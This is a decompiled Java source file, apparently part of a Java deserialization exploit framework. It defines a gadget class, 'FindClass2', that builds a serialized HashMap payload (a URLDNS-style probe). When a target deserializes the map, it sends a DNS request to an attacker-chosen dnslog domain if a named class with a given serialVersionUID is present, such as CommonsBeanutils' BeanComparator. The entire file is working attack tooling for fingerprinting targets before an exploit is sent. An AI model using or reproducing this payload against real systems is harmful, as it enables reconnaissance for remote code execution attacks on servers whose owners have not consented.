/*
 * Decompiled with CFR 0.152.
 */
package com.ar3h.chains.gadget.impl.javanative.jdk;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.util.CommonUtil;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;
import java.util.Map;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtField;
import javassist.NotFoundException;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

@GadgetTags(tags={"JavaNativeDeserialize", "END"})
@GadgetAnnotation(name="DNSLog\u63a2\u6d4b\u7c7b2-\u6307\u5b9asuid", description="\u7cbe\u786e\u63a2\u6d4b\u76ee\u6807\u7c7b\u7248\u672c\n\u6307\u5b9a\u7c7b\u7684 serialVersionUID \u5b57\u6bb5, \u5982\u679c\u76ee\u6807\u5b58\u5728\u8be5\u7c7b\u4e14suid\u80fd\u591f\u4e0e\u4e4b\u76f8\u5bf9\u5e94\u624d\u4f1a\u5411\u5916\u53d1\u8d77DNSLog\u8bf7\u6c42\n\u5982\u679c\u53ea\u60f3\u63a2\u6d4b\u7c7b\u662f\u5426\u5b58\u5728\u8bf7\u4f7f\u7528 FindClass", authors={"Ar3h"}, priority=20)
public class FindClass2
implements Gadget {
    private static final Logger log = LoggerFactory.getLogger(FindClass2.class);
    @Param(name="\u63a2\u6d4b\u6210\u529f\u540e\u8bbf\u95ee\u7684dnslog\u57df\u540d", description="eg: xxx.dnslog.cn")
    public String domain = "xxx.dnslog.cn";
    @Param(name="\u9700\u8981\u63a2\u6d4b\u7684\u7c7b\u540d")
    public String className = "org.apache.commons.beanutils.BeanComparator";
    @Param(name="\u8bbe\u7f6e\u7c7b\u7684suid", description="\u8bbe\u7f6e\u7c7b\u7684 serialVersionUID \u5b57\u6bb5\neg: CommonsBeanutils 1.9.4 \u7684 BeanComparator suid \u4e3a: -2044202215314119608L")
    public String suid = "-2044202215314119608L";
    private static final ClassPool classPool = ClassPool.getDefault();
    public static Map<String, Class> cacheMap = new HashMap<String, Class>();
    private static final String fieldName = "serialVersionUID";
    private static final String fieldValue = "private static final long serialVersionUID = %s;";

    public Object getObject() throws Exception {
        String url = "http://" + this.domain;
        String className = this.className;
        String suid = this.suid;
        return this.getHashMapPayload(url, className, suid);
    }

    @Override
    public Object invoke(GadgetContext context, GadgetChain chain) throws Exception {
        return this.getObject();
    }

    public HashMap getHashMapPayload(String urls, String clazzName, String suid) {
        HashMap<URL, Class> hashMap = new HashMap<URL, Class>();
        try {
            URL url = new URL(urls);
            Field f = Class.forName("java.net.URL").getDeclaredField("hashCode");
            f.setAccessible(true);
            f.set(url, 0);
            Class clazz = this.getClass(clazzName, suid);
            hashMap.put(url, clazz);
            f.set(url, -1);
        }
        catch (Exception e) {
            log.error(e.toString());
        }
        return hashMap;
    }

    public static Class<?> getClazzWithSuid(String clazzName, String suid) throws ClassNotFoundException {
        CtClass ctClass = null;
        try {
            ctClass = classPool.getOrNull(clazzName);
            if (ctClass == null) {
                ctClass = classPool.makeClass(clazzName);
            } else if (ctClass.isFrozen()) {
                ctClass.defrost();
            }
            try {
                CtField field = ctClass.getDeclaredField(fieldName);
                ctClass.removeField(field);
            }
            catch (NotFoundException field) {
                // empty catch block
            }
            ctClass.addField(CtField.make(String.format(fieldValue, suid), ctClass));
            byte[] byteCode = ctClass.toBytecode();
            TemporaryClassLoader tempLoader = new TemporaryClassLoader();
            return tempLoader.defineClass(clazzName, byteCode);
        }
        catch (Exception e) {
            return Class.forName(clazzName);
        }
    }

    public Class getClass(String clazzName, String suid) throws Exception {
        String hashKey = CommonUtil.getMd5(this.className + suid);
        Class<?> clazz = cacheMap.get(hashKey);
        if (clazz == null) {
            clazz = FindClass2.getClazzWithSuid(clazzName, suid);
            cacheMap.put(hashKey, clazz);
            Field declaredField = clazz.getDeclaredField(fieldName);
            declaredField.setAccessible(true);
            System.out.println(declaredField.get(null));
        }
        return clazz;
    }

    static class TemporaryClassLoader
    extends ClassLoader {
        TemporaryClassLoader() {
        }

        public Class<?> defineClass(String name, byte[] byteCode) {
            return this.defineClass(name, byteCode, 0, byteCode.length);
        }
    }
}

